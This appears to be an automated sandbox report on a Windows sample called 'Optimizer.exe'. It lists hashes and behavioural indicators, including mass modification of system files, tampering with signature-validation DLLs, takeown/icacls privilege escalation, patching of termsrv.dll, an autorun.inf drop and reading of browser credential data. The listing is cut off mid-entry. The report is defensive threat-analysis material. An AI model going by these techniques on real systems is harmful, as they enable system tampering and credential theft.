Analysis
-
max time kernel
150s -
max time network
93s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-11-2024 08:45
General
-
Target
Optimizer.exe
-
Size
159KB
-
MD5
a5eb0d1b79f64f7ace12d65e26a6d4f3
-
SHA1
b0386cb68d3b771687b5e4ac9d133db9a8d201f0
-
SHA256
94b05cc89c01e748e28bfe6b0484f27af6b0fb3814cdf8b5995c4138c3779eff
-
SHA512
7fd40a59517c7702ea13ecf1eea8f6779f691337837619841b27ffcf396ea69751429ea2cf607f451cd0712ae708d91e1953e0132c6c3603fc4382f766d880ac
-
SSDEEP
3072:MwavFbFSymUJlum6XhJTeiWswHQVcScs7e3/0omHPOTvYFZloH8:MnvFbFfV7udxteiWpQVcEe3MAvYFZloc
Malware Config
Signatures
-
Drops file in Drivers directory 64 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\PktMon.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\EhStorTcgDrv.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\NdisImPlatform.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\pacer.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\storqosflt.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\tunnel.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\urscx01000.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\cdrom.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\filetrace.sys cmd.exe File opened for modification C:\Windows\System32\drivers\msfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\VerifierExt.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\bindflt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\cng.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\tsusbflt.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\beep.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\pdc.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\null.sys cmd.exe File opened for modification C:\Windows\System32\drivers\usbehci.sys cmd.exe File opened for modification C:\Windows\System32\drivers\WUDFRd.sys cmd.exe File opened for modification C:\Windows\System32\drivers\battc.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mskssrv.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mstee.sys cmd.exe File opened for modification C:\Windows\System32\drivers\WindowsTrustedRT.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\pci.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\hidbatt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\HidSpiCx.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Hsp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mrxdav.sys cmd.exe File opened for modification C:\Windows\System32\drivers\sfloppy.sys cmd.exe File opened for modification C:\Windows\System32\drivers\storqosflt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\vdrvroot.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\smbdirect.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\CAD.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\vdrvroot.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\fsdepends.sys cmd.exe File opened for modification C:\Windows\System32\drivers\kbdhid.sys cmd.exe File opened for modification C:\Windows\System32\drivers\serial.sys cmd.exe File opened for modification C:\Windows\System32\drivers\wmiacpi.sys cmd.exe File opened for modification C:\Windows\System32\drivers\AcpiDev.sys cmd.exe File opened for modification C:\Windows\System32\drivers\ndiscap.sys cmd.exe File opened for modification C:\Windows\System32\drivers\nvmedisk.sys cmd.exe File opened for modification C:\Windows\System32\drivers\winhv.sys cmd.exe File opened for modification C:\Windows\System32\drivers\bridge.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\vhdmp.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\netio.sys cmd.exe File opened for modification C:\Windows\System32\drivers\SleepStudyHelper.sys cmd.exe File opened for modification C:\Windows\System32\drivers\clfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rootmdm.sys cmd.exe File opened for modification C:\Windows\System32\drivers\wimmount.sys cmd.exe File opened for modification C:\Windows\System32\drivers\hwpolicy.sys cmd.exe File opened for modification C:\Windows\System32\drivers\cdrom.sys cmd.exe File opened for modification C:\Windows\System32\drivers\bam.sys cmd.exe File opened for modification C:\Windows\System32\drivers\kdnic.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\ataport.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\scfilter.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\spaceport.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\monitor.sys cmd.exe File opened for modification C:\Windows\System32\drivers\msquic.sys cmd.exe File opened for modification C:\Windows\System32\drivers\BtaMPM.sys cmd.exe File opened for modification C:\Windows\System32\drivers\kmpdc.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rdyboost.sys cmd.exe File opened for modification C:\Windows\System32\drivers\tunnel.sys cmd.exe File opened for modification C:\Windows\System32\drivers\hdaudbus.sys cmd.exe File opened for modification C:\Windows\System32\drivers\scmbus.sys cmd.exe -
Manipulates Digital Signatures 4 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll cmd.exe File opened for modification C:\Windows\System32\wintrust.dll cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll cmd.exe File opened for modification C:\Windows\SysWOW64\wintrust.dll cmd.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid Process 2528 takeown.exe 3084 icacls.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid Process 2528 takeown.exe 3084 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 33 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AMC91F~1.348\f\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMCB8F~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMDA56~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMC513~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM22CA~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMA43B~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMF8C5~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMDDA5~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMC91F~1.348\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM93FA~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMF508~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM92CB~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM038E~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMAF9C~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM2C78~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AMA81C~1.348\f\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM52F5~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM4FF1~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM2F26~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM6E67~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMA81C~1.348\r\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM5B14~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMA81C~1.348\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMA81C~1.348\f\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM3BE9~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMC91F~1.348\f\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMC91F~1.348\r\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM5E13~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMCE4F~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM73DC~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMFB2A~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMD412~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMB160~1.1_N\desktop.ini cmd.exe -
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\BITLOC~1\autorun.inf cmd.exe -
Drops file in System32 directory 64 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\System32\DriverStore\FileRepository\tsgenericusbdriver.inf_amd64_eeea0aec44c581b1\tsgenericusbdriver.inf cmd.exe File opened for modification C:\Windows\System32\LocationApi.dll cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\Modules\MsDtc\MSFT_DtcTask_v1.0.cdxml cmd.exe File opened for modification C:\Windows\SysWOW64\lt-LT\windows.ui.xaml.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\uk-UA\pots.dll.mui cmd.exe File opened for modification C:\Windows\System32\uk-UA\RestartManagerUninstall.mfl cmd.exe File opened for modification C:\Windows\System32\wbem\rspndr.mof cmd.exe File opened for modification C:\Windows\SysWOW64\IPHLPAPI.DLL cmd.exe File opened for modification C:\Windows\SysWOW64\replace.exe cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetSecurity\NetIPsecMainModeRule.cmdletDefinition.cdxml cmd.exe File opened for modification C:\Windows\System32\en-US\eapphost.dll.mui cmd.exe File opened for modification C:\Windows\System32\wbem\en-US\WMIsvc.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\uk-UA\MSFT_WindowsOptionalFeature.schema.mfl cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\HELLOF~2.INF\FaceRecognitionEngineAdapterResources_v3.dll cmd.exe File opened for modification C:\Windows\System32\fr-FR\nsisvc.dll.mui cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml cmd.exe File opened for modification C:\Windows\System32\config\TxR\{21A4A~1.REG cmd.exe File opened for modification C:\Windows\System32\en-US\sscore.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\de-DE\serwvdrv.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_EnvironmentResource\ja-JP\MSFT_EnvironmentResource.schema.mfl cmd.exe File opened for modification C:\Windows\System32\lv-LV\quickassist.exe.mui cmd.exe File opened for modification C:\Windows\System32\migwiz\replacementmanifests\DHCPServerMigPluginWin8-Replacement.man cmd.exe File opened for modification C:\Windows\SysWOW64\gptext.dll cmd.exe File opened for modification C:\Windows\System32\en-US\usbmon.dll.mui cmd.exe File opened for modification C:\Windows\System32\en-US\WmiMgmt.msc cmd.exe File opened for modification C:\Windows\System32\fr-FR\colorcpl.exe.mui cmd.exe File opened for modification C:\Windows\System32\ja-jp\LanguageOverlayServer.dll.mui cmd.exe File opened for modification C:\Windows\System32\ja-jp\MSWMDM.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\KBDTH1.DLL cmd.exe File opened for modification C:\Windows\System32\DriverStore\it-IT\wvmbusvideo.inf_loc cmd.exe File opened for modification C:\Windows\System32\oobe\Setup.exe cmd.exe File opened for modification C:\Windows\System32\sfc.exe cmd.exe File opened for modification C:\Windows\System32\Speech\Engines\SR\ja-JP\srloc.dll.mui cmd.exe File opened for modification C:\Windows\System32\spp\tokens\skus\PROFES~1\Professional-Volume-CSVLK-3-ul-oob-rtm.xrm-ms cmd.exe File opened for modification C:\Windows\System32\es-ES\proquota.exe.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\NetworkDesktopSettings.dll.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\it-IT\whvcrash.inf_loc cmd.exe File opened for modification C:\Windows\System32\jscript.dll cmd.exe File opened for modification C:\Windows\SysWOW64\Dism\it-IT\ProvProvider.dll.mui cmd.exe File opened for modification C:\Windows\System32\AssignedAccessRuntime.dll cmd.exe File opened for modification C:\Windows\System32\DriverStore\ja-JP\hpsamd.inf_loc cmd.exe File opened for modification C:\Windows\System32\es-ES\IpsmSnap.dll.mui cmd.exe File opened for modification C:\Windows\System32\uk-UA\moshost.dll.mui cmd.exe File opened for modification C:\Windows\System32\WindowsCodecsRaw.dll cmd.exe File opened for modification C:\Windows\System32\DriverStore\es-ES\nvraid.inf_loc cmd.exe File opened for modification C:\Windows\System32\DriverStore\ja-JP\c_smrvolume.inf_loc cmd.exe File opened for modification C:\Windows\System32\de-DE\rtffilt.dll.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\en-US\bthpan.inf_loc cmd.exe File opened for modification C:\Windows\System32\syncutil.dll cmd.exe File opened for modification C:\Windows\SysWOW64\KBDHELA2.DLL cmd.exe File opened for modification C:\Windows\System32\DriverStore\es-ES\wfpcapture.inf_loc cmd.exe File opened for modification C:\Windows\System32\fr-FR\wavemsp.dll.mui cmd.exe File opened for modification C:\Windows\System32\en-US\kmddsp.tsp.mui cmd.exe File opened for modification C:\Windows\System32\EnterpriseModernAppMgmtCSP.dll cmd.exe File opened for modification C:\Windows\System32\ja-jp\twinapi.appcore.dll.mui cmd.exe File opened for modification C:\Windows\System32\de-DE\DFDWiz.exe.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\IEAdvpack.dll.mui cmd.exe File opened for modification C:\Windows\System32\ja-jp\CloudExperienceHostCommon.dll.mui cmd.exe File opened for modification C:\Windows\System32\RTWorkQ.dll cmd.exe File opened for modification C:\Windows\SysWOW64\en-US\osbaseln.dll.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\rasdial.exe.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\sethc.exe.mui cmd.exe File opened for modification C:\Windows\SysWOW64\Dism\es-ES\WimProvider.dll.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\en-US\prnms010.inf_loc cmd.exe -
Modifies termsrv.dll 1 TTPs 1 IoCs
Commonly used to allow simultaneous RDP sessions.
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\System32\termsrv.dll cmd.exe -
Processes:
resource yara_rule behavioral1/memory/1716-0-0x00007FF69AF40000-0x00007FF69AF9A000-memory.dmp upx behavioral1/memory/1716-2-0x00007FF69AF40000-0x00007FF69AF9A000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\PROGRA~1\WindowsApps\MICROS~2.0_X\Assets\AppTiles\NE4989~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~2.0_X\Assets\AppTiles\NewsAppList.targetsize-96.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\CONTRA~2\HX25AA~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\wwwroot\favicon.ico cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\ja-JP\tipresx.dll.mui cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~3.0_X\Assets\AppTiles\CONTRA~1\WeatherAppList.targetsize-60_altform-lightunplated_contrast-black.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI8E4F~1.0_X\Win10\CONTRA~1\MIFFDB~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICB88~1.0_X\Assets\AppTiles\CONTRA~1\WIDETI~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\react\lib-amd\COACHM~1.JS cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI1864~1.0_X\Assets\AppList.targetsize-16_altform-lightunplated.png cmd.exe File opened for modification C:\PROGRA~3\MICROS~1\Windows\AppRepository\Packages\MICROS~3.100\ACTIVA~1.LOG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIA51D~1.0_X\Assets\CONTRA~1\GE96A8~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI91CD~1.0_X\Assets\PAC7D5~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI98F9~1.0_X\Assets\CONTRA~1\AppList.targetsize-96_contrast-black.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIF169~1.0_X\Assets\PHEE13~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI4490~1.0_X\Assets\MUSIC_~1.JPG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\DELETE~1\MICFAA~1.SCA\Assets\AppTiles\STORES~3.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\CONTRA~2\HxMailAppList.targetsize-36_altform-unplated.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\Dismiss.scale-64.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\HXDE1E~1.PNG cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.5\System.Web.Abstractions.dll cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\CONTRA~2\EX38DA~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\HX653A~1.PNG cmd.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\ink\Microsoft.Ink.dll cmd.exe File opened for modification C:\PROGRA~2\WI8A19~1\es-ES\PhotoViewer.dll.mui cmd.exe File opened for modification C:\PROGRA~3\MICROS~1\Windows\AppRepository\WINDOW~3.XML cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~2.0_X\Assets\AppTiles\CONTRA~2\NEWSSM~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI686B~1.0_X\Assets\TI6245~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\CONTRA~2\HX9FCF~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICAAC~1.0_X\Assets\AppTiles\CONTRA~2\MAF9CE~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\theme\NODE_M~1\@UIFAB~1\MERGE-~1\lib-amd\TRANSF~1\RTLIFY~1.JS cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\TH869E~1.JPG cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\es\System.Printing.resources.dll cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.5\es\System.Data.DataSetExtensions.Resources.dll cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\DELETE~1\MI63E7~1.SCA\Assets\AppTiles\STOREL~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI0946~1.0_X\Assets\CONTRA~2\PeopleAppList.targetsize-72.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIBB01~1.0_X\Assets\SCA8BD~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICB88~1.0_X\Assets\AppTiles\APPICO~3.PNG cmd.exe File opened for modification C:\PROGRA~3\MICROS~1\Windows\AppRepository\MI9141~1.XML cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIF8B8~1.0_X\Assets\CONTRA~1\AppList.targetsize-64_contrast-black.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI9463~1.0_X\Assets\SmallTile.scale-400.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIFFD7~1.SCA\Assets\PhotosSplashScreen.contrast-black_scale-100.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\CONTRA~1\HxMailAppList.targetsize-16_altform-lightunplated.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI0171~1.0_X\Assets\AppTiles\STOREM~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~2.SCA\Assets\AppTiles\NEWSME~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\HxAccountsLargeTile.scale-100.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIDE1B~1.0_X\Assets\VOAAB5~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\theme\NODE_M~1\@UIFAB~1\MERGE-~1\LIB-CO~1\ISTYLE~2.JS cmd.exe File opened for modification C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.0\System.IdentityModel.Selectors.dll cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\fr\System.Speech.resources.dll cmd.exe File opened for modification C:\PROGRA~1\WI54FB~1\mpvis.DLL cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~4.0_X\Assets\CONTRA~1\AppPackageAppList.targetsize-24_altform-unplated_contrast-black.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI43C8~1.SCA\APPXSI~1.P7X cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI3116~1.0_X\images\TH2D3A~1.SVG cmd.exe File opened for modification C:\PROGRA~2\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Diagnostics\Comprehensive\Comprehensive.Tests.ps1 cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~3.0_X\Assets\AppTiles\CONTRA~2\WE5AB6~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI686B~1.0_X\Assets\TipsAppList.targetsize-48_altform-lightunplated.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\theme\NODE_M~1\@FLUEN~1\DOM-UT~1\lib\index.js cmd.exe File opened for modification C:\PROGRA~3\MICROS~1\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICB88~1.0_X\Assets\AppTiles\CONTRA~1\APPICO~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\react\lib\COMPON~1\DETAIL~1\DE28CA~1.JS cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~1.9_X\DASHBO~1\WEBCON~1\NODE_M~1\@FLUEN~1\theme\lib-amd\types\ISpacing.js cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI91CD~1.0_X\Assets\CONTRA~2\PaintAppList.targetsize-60_altform-lightunplated.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI91CD~1.0_X\MICROS~1.MET\S-1-5-21-4249425805-3408538557-1766626484-1000-MergedResources-0.pri cmd.exe -
Drops file in Windows directory 64 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\WIF3D2~1.MUM cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\MI5488~2.MUM cmd.exe File opened for modification C:\Windows\SystemApps\MICROS~1.SEC\Assets\Square150x150Logo.contrast-white_scale-400.png cmd.exe File opened for modification C:\Windows\SystemApps\ParentalControls_cw5n1h2txyewy\resources.pri cmd.exe File opened for modification C:\Windows\SystemResources\Windows.UI.PCShell\Windows.UI.PCShell.pri cmd.exe File opened for modification C:\Windows\WinSxS\AMAFCD~1.1_N\mdmcom1.inf cmd.exe File opened for modification C:\Windows\diagnostics\system\Power\es-ES\RS_Adjustwirelessadaptersettings.psd1 cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AM2569~1.348\f\SYNCRE~1.MUI cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\MIB260~1.CAT cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\X82E56~1.MAN cmd.exe File opened for modification C:\Windows\servicing\Packages\Microsoft-OneCore-Connectivity-Serial-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat cmd.exe File opened for modification C:\Windows\servicing\Packages\MIAA37~1.MUM cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AM6A13~1.120\f\RS_ADJ~1.PSD cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\MIBBA1~1.CAT cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\WI960D~1.MUM cmd.exe File opened for modification C:\Windows\WinSxS\AMC9A6~1.1_D\WERFAU~2.MUI cmd.exe File opened for modification C:\Windows\Cursors\wait_im.cur cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\WI6C86~1.MUM cmd.exe File opened for modification C:\Windows\WinSxS\AM27D3~1.1_N\KEYBOA~2.PNG cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AMF9D8~2.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AMFF53~1.1_F\EXTRAC~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\AMCFD2~1.1_J\ftpres.dll.mui cmd.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\1036\vbc7ui.dll cmd.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\fr\UIAutomationClient.resources.dll cmd.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Internal.Tasks.Dataflow.dll cmd.exe File opened for modification C:\Windows\WinSxS\AM94B9~1.1_J\PERFDI~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\AM9A88~1.100\CS8810~1.XRM cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AM6353~1.120\f\NA981E~1.PNG cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\CO6C82~1.MUM cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\MI99C8~1.MUM cmd.exe File opened for modification C:\Windows\WinSxS\AM0A57~1.1_N\C_CASH~1.INF cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AM66EB~1.348\f\CO4771~1.XRM cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\HY9633~1.CAT cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\MIE5EB~1.CAT cmd.exe File opened for modification C:\Windows\WinSxS\AM0C3C~1.1_J\MCIQTZ~1.MUI cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AMA886~1.120\f\RS_ADJ~2.PSD cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AMCDC3~2.MAN cmd.exe File opened for modification C:\Windows\servicing\Packages\CO76CD~1.MUM cmd.exe File opened for modification C:\Windows\WinSxS\AM8A99~1.434\SHAREH~1.DLL cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\MI250A~1.CAT cmd.exe File opened for modification C:\Windows\servicing\Packages\HyperV-Guest-Networking-SrIov-merged-Package~31bf3856ad364e35~amd64~~10.0.22000.1.cat cmd.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.targetsize-24_altform-unplated_contrast-black.png cmd.exe File opened for modification C:\Windows\WinSxS\AM469D~1.1_I\SYA5EB~1.DLL cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AM6D71~1.MAN cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\HY4D4F~1.CAT cmd.exe File opened for modification C:\Windows\WinSxS\AME6EB~1.348\f\SyncRes.dll.mui cmd.exe File opened for modification C:\Windows\servicing\Packages\HY6D6E~1.MUM cmd.exe File opened for modification C:\Windows\servicing\Packages\MIF2CD~1.MUM cmd.exe File opened for modification C:\Windows\servicing\Packages\MI5AF8~1.CAT cmd.exe File opened for modification C:\Windows\WinSxS\AMFBCD~1.1_I\DMIPRO~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\AMA6BF~1.1_N\DFS~1.ADM cmd.exe File opened for modification C:\Windows\Cursors\pen_l.cur cmd.exe File opened for modification C:\Windows\INF\btampm.inf cmd.exe File opened for modification 